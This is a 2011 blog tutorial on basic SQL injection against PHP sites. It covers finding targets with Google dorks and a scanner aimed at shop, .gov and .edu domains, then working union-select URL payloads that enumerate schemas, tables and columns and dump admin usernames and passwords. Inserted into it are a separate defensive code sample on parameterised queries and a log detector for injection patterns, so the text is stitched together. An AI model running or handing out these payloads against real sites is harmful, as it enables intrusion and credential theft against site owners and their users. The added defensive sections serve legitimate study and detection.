Sunday, 27 November 2011

Basic SQL Injection Tutorial

By reading this tutorial you agree that:

The author is not responsible in any way for your actions done by the use of this tutorial.
The tutorial is for educational purposes only and for no site harm.
If posting this tutorial somewhere else, give credits to the author uRBAN dAMAGE.



Step №1
Finding a vulnerable site

There are many ways to find a vulnerable website. I will show you a fast method and a slow, manual method, so that you know what the fast method actually does. Both methods are accurate.


Method №1

This is the slow manual method. For this you will need a list of dorks and Google.
Here is a list of dorks: Link
Once you have downloaded it, choose one dork from the list and continue reading.
I will be using the dork "show.php?id=". Once you have chosen yours, go to Google, type it in and hit Enter.



Method №2


My favorite way.
Go to This website.
Type your dork in the textbox and choose "Bing", not "Google"!!!
Make sure you check "Depth scan ( slow but sure )".


Hit Enter; the sites you see with "@ id" at the end of the URL are vulnerable.
They also show up whiter than the others.


Method №3
Download the KORRUPT scanner from here: Link
Just click on the EXE picture. I guarantee that it is not infected.
How to use:
1. Enter the path to your dorklist, e.g. "C:\dorks.txt".
2. Enter a domain to search, for example ".co.uk", ".nl", ".gov", ".edu", etc. (blank for any).
3. Enter a keyword, for example "shop", "paypal", "xbox", etc. (blank for any).
4. Set the timeout to something reasonable; ~5000 (= 5 seconds) works well. Something too low will be fast but will not bring back good results.
5. The yellow text that appears shows the crawled links.
6. Red text while scanning marks the invulnerable links, green marks the vulnerable ones.
7. All vulnerable links are stored in the application path.
Credits for the program and the "How to use" go to kript0x.


==

Step №2
Finding out manually whether a website is vulnerable or not.

Let's say you got your website from the first method I explained above and you want to check whether it is vulnerable or not.
What you have to do is put a simple " ' " at the end of the site's URL.
E.g.: http://www.yoursite.com/show.php?id=12'
If it shows some kind of error somewhere on the site, like this one:

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1"

then the site you chose is vulnerable. This is also how the automatic scanner from method number 2 works.
Remember the error will not always be the same; it can be different every time!
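Why that stray quote produces a database error, and how a site avoids it, as an added example that is not part of the original tutorial: a Python/sqlite3 stand-in for a show.php?id= handler that pastes the query string into the SQL, beside the same lookup using a bound parameter. The table name, rows and error text are constructed here (sqlite's wording differs from MySQL's).

```python
import sqlite3

# Constructed stand-in for the site's database (not from the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(12, "Welcome"), (13, "Second post")])
    return conn

def lookup_vulnerable(conn, raw_id):
    """Like a show.php?id= handler that pastes the raw parameter into the SQL.
    The quote becomes part of the statement, so the parser chokes and the
    site leaks the database error the tutorial looks for."""
    sql = "SELECT title FROM news WHERE id = " + raw_id
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as err:
        return "DB error: " + str(err)   # what an unhardened page would display

def lookup_safe(conn, raw_id):
    """Same lookup with a bound parameter: the input is only ever a value,
    so a quote or an appended clause cannot change the query's shape."""
    sql = "SELECT title FROM news WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (raw_id,))]

if __name__ == "__main__":
    db = make_db()
    for probe in ("12", "12'"):
        print(repr(probe), "->", lookup_vulnerable(db, probe), "|", lookup_safe(db, probe))
```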


==

Step №3
Injecting...

From here on you will start learning about the codes you need to successfully inject a website and get the admin login details and the admin page of the targeted site.

How sites work: Site->Database->Tables->Columns->Data


Code №1
Finding Columns

Now once you know that your targeted site is vulnerable to SQL Injection, you have to find the number of columns the database has.
The code we will be using to find this out is:
Code:
http://www.yoursite.com/show.php?id=12 order by 10


Now let me explain this bit of code.
Errors might look like this one: "Unknown column '123985' in 'order clause'". It might be different as well!
Simply put, the "order by" command is used to count the number of columns in the site's database.
The number after "order by" is the column number you are testing. If you write a number higher than the number of columns in the site's database, it will show you an error. The trick is to find the last number before the one that gives an error. So I type "order by 10" and I don't get an error, which means I have to go higher. I type "order by 11" and I get an error, which means we have 10 columns in the database, since we got an error on the 11th and not on the 10th.

Now we go to -->

Code №2
Finding Vulnerable Columns

Now we know how to find the number of columns, but we don't know how to find which of them are vulnerable. Let me show you the code and then explain.
Code:
http://www.yoursite.com/show.php?id=-12 union all select 1,2,3,4,5,6,7,8,9,10--



Do not forget the " - " in front of the site's id number, in this case 12. Remember the number might be different from the one in the tutorial.
From our example above we have 10 columns in the site's database; that is why we write every single one of them separated with commas.
The command "union all select" selects all of the columns and shows which ones are vulnerable on the site.
When you type that command you will see some bits of the page disappear and some numbers from 1 to 10 in their place.
It will look like this (screenshot not reproduced here):

So the vulnerable columns will be shown like that, and in our case it is 1. You can inject using this vulnerable column.
Now we go to-->

Code №3
Finding SQL Version

Now to find the SQL version you need to type in this code.
Code:
http://www.yoursite.com/show.php?id=-12 union all select @@version,2,3,4,5,6,7,8,9,10--


Now the "@@version" string, which replaced the vulnerable column 1, will give you the SQL version in column 1's place.
If your targeted site is a version lower than 5 then just move on; it's hard to inject sites like that and it's not for beginners.

Now we go to-->

Code №4
Finding Database Names

A site can have from 1 database to more than you can count, but usually you can count them on your fingers.
You will need those database names if you can't find the admin data, tables and columns in the default database, which every SQL Injection vulnerable site has except the ones lower than version 5.
The code:
Code:
http://www.yoursite.com/show.php?id=-12 union all select group_concat(schema_name),2,3,4,5,6,7,8,9,10 from information_schema.schemata--


This code will take all the database names from the site.
Now if you can't find the admin table and columns with the default SQL "information_schema" database, then you have to add this to the other code:
Code:
where table_schema=database(0xHEX)


This code means that it will extract the wanted data from the database specified. The "(0xHEX)" is the name of the database: in place of "HEX" you have to put the hex value of the database name. You can convert it here: http://www.swingnote.com/tools/texttohex.php
The "0x" prefix marks the value as hexadecimal; the query then extracts data from that database...


Now we go to-->

Code №5
Finding Table Names

Now you will need the code for finding the table names. You need the table names to find the table which holds the admin data columns. This means that you need to find the table with e.g. the name "admin_table", and this table will contain the columns, e.g. "admin_user" & "admin_pass", from which you will retrieve the actual info.
The code is:
Code:
http://www.yoursite.com/show.php?id=-12 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10 from information_schema.tables--


Now to explain this bit of code. "group_concat(table_name)" in the place of the vulnerable column number 1 means that it will take all of the table names and list them in the space of vulnerable column number 1.
The next bit of code, "from information_schema.tables", means that it will take the table names from the database named "information_schema".
The whole thing reads as:

http://www.yoursite.com/show.php?id=-12 union all list_all_table_names,2,3,4,5,6,7,8,9,10 from database_named_"information_schema".location_tables--
Now let's say we found the table name "admin_tbl".

Now we go to-->

Code №6
Finding Column Names

Now to find the column names for the admin data, which are in the table we found earlier.
Code:
http://www.yoursite.com/show.php?id=-12 union all select group_concat(column_name),2,3,4,5,6,7,8,9,10 from information_schema.columns--


This bit of code is exactly the same as the one above; the only difference is that you have to change "table" to "column".
It is explained the same way: get column names from database inf_schema.loc_columns...
Sometimes you have to put "where table_schema=database()" at the end of the code if you can't find the column names. This bit of code means that it will look only in the database you told it to look into.
Now let's say the names of the columns we found are "admin_user" & "admin_pass".

Now we go to-->

Code №7
Finding Admin Login Details

Now to find the data, i.e. the admin login details, you have to use this code.
Code:
http://www.yoursite.com/show.php?id=-12 union all select group_concat(admin_user,0x3a,admin_pass),2,3,4,5,6,7,8,9,10 from admin_tbl--


To explain this code:
group_concat(admin_user,0x3a,admin_pass) from admin_tbl means "get the information from the admin_user and admin_pass columns" from the admin data table "admin_tbl".
The "0x3a" between the two columns is the ASCII colon character. Simply put, this code gets the admin account and password and separates them with a colon in the vulnerable column number 1.
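As an added defensive example, not from the original tutorial: a Python scan over constructed Apache-style access-log lines that flags the probes walked through in Codes 1 to 7 (the trailing quote, "order by" enumeration, "union ... select", information_schema, @@version, group_concat) and lists the clients that triggered more than one of them. The log lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log (not from the page): 203.0.113.5 repeats
# the probes described in this tutorial, 198.51.100.7 is an ordinary visitor.
SAMPLE_LOG = """
203.0.113.5 - - [27/Nov/2011:10:00:01 +0000] "GET /show.php?id=12 HTTP/1.1" 200 5120
203.0.113.5 - - [27/Nov/2011:10:00:07 +0000] "GET /show.php?id=12%27 HTTP/1.1" 500 312
203.0.113.5 - - [27/Nov/2011:10:00:15 +0000] "GET /show.php?id=12%20order%20by%2011 HTTP/1.1" 500 298
203.0.113.5 - - [27/Nov/2011:10:00:30 +0000] "GET /show.php?id=-12%20union%20all%20select%20group_concat(schema_name),2,3,4,5,6,7,8,9,10%20from%20information_schema.schemata-- HTTP/1.1" 200 4870
198.51.100.7 - - [27/Nov/2011:10:01:00 +0000] "GET /show.php?id=13 HTTP/1.1" 200 5002
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Indicator name plus a regex applied to the URL-decoded request path.
INDICATORS = [
    ("quote-probe", re.compile(r"[?&]\w+=-?\d+'")),
    ("order-by-enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("version-probe", re.compile(r"@@version", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
]

def classify(path):
    """Return the names of all indicators present in one decoded request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]

def scan_log(text):
    """Return (ip, status, indicators) for every request that matched something."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        found = classify(m["path"])
        if found:
            hits.append((m["ip"], int(m["status"]), found))
    return hits

def suspicious_ips(text, threshold=2):
    """IPs that triggered at least `threshold` distinct indicators over the log."""
    seen = {}
    for ip, _status, found in scan_log(text):
        seen.setdefault(ip, set()).update(found)
    return sorted(ip for ip, names in seen.items() if len(names) >= threshold)
```

Note that the 500 responses on the quote and "order by" requests are the server-side trace of the errors this tutorial relies on; alerting on a 500 that coincides with one of these indicators is a cheap first detection.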


Code №8
Finding Admin Login Page

Actually this is not a code but just a site which will help you find the admin pages.

http://sc0rpion.ir/af/

Go here and post your vulnerable site without the dork at the end; not like this: http://www.yoursite.com/news.php?id=12
but like this:
http://www.yoursite.com/

F.A.Q

Question: This method doesn't work. Why?
Answer: Because there are more methods for SQL Injection; it is not only the basic one. Some of the others are Blind SQL Injection, Error-based SQL Injection and more; search HF for tutorials on those. There could also be a WAF (Web Application Firewall), which filters certain codes/words so you can't inject with them.

Credit to : uRBAN dAMAGE
